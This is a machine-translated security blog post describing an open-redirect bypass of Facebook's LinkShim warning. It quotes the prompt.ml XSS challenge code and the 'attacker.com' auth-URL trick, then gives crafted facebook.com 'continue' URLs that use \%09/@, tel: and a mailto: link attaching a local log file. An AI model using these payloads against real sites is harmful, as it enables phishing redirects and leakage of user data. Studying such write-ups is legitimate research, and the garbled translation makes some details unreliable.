How can I bypass the LinkShim of fackbook again?

How can I bypass the LinkShim of fackbook again?

I have previously discovered a Url redirection and xss vulnerability on facebook and successfully bypassed LinkShim. Fackbook then fixes the vulnerability. Six months later, I found another method to bypass LinkShim on the same url and sent it to everyone to learn it.

2cto: What is LinkShim

LinkShim is a protection measure used by fackbook to prevent users from being redirected to malicious websites. When you access a malicious website in fackbook, a similar window will pop up to remind you of this.

First, it's an insignificant but cool technical point. This is what I learned from the fourth level of the prompt. ml XSS challenge.

See the following code.

function escape(input) {    // make sure the script belongs to own site    // sample script: http://prompt.ml/js/test.js    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {        var script = document.createElement('script');        script.src = input;        return script.outerHTML;    } else {        return 'Invalid resource.';    }}

This is the JS source code of the fourth level, with the goal of bypassing Regular Expression matching and redirecting to another website. The main problem is that he uses decodeURIComponent () to decode the input parameter url. We can trick the browser into using http auth.

http: //prompt .ml\@attacker.com

This can bypass the regular expression because it has prompt. ml, but can be redirected to attacker.com.

When I saw the fackbook url jump vulnerability this time, I found that they are so similar.

When you access this link:

https: //m .facebook.com /feed_menu/ ?story_fbid=808015282566492& id =100000740832129&confirm=h& continue =http: //  evilzone.org

This will trigger Link Shim and remind the user whether to jump. Obviously, evilzone.org is in the blacklist.

Then I used \/evilzone.org to try to bypass it, because most browsers will change \/evilzone.org to // evilzone.org

For more details, see http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html

Unfortunately, \/was intercepted, so I started to fuzz.

Eventually, a great God told me that \ % 09/@ site.com could be bypassed. It is equivalent to // @ site.com and is not in the blacklist.

So I finally bypassed it like this.

https: //m .facebook.com /feed_menu/ ?story_fbid=808015282566492& id =100000740832129&confirm=h& continue =\%09/@example.com

During the test, I found that both tel: And mailto: can be used, so we can construct such a link.

https: //m .facebook.com /feed_menu/ ?story_fbid=808015282566492& id =100000740832129&confirm=h& continue =tel:+251928475100
  https: //m .facebook.com /feed_menu/ ?story_fbid=808015282566492& id =100000740832129&confirm=h& continue =mailto:lastname.firstname@xxx.com?subject=APPname%20support%20issue&body=Version%20x.x%0D%0A%0D%0APlease%20make%20some%20descriptions%20here:%0D%0A%0D%0A%0D%0A&attach=C:\Documents%20and%20Settings\username\Desktop\foldername\APPname_20121123.log

This will send an email containing attachments to sensitive user information.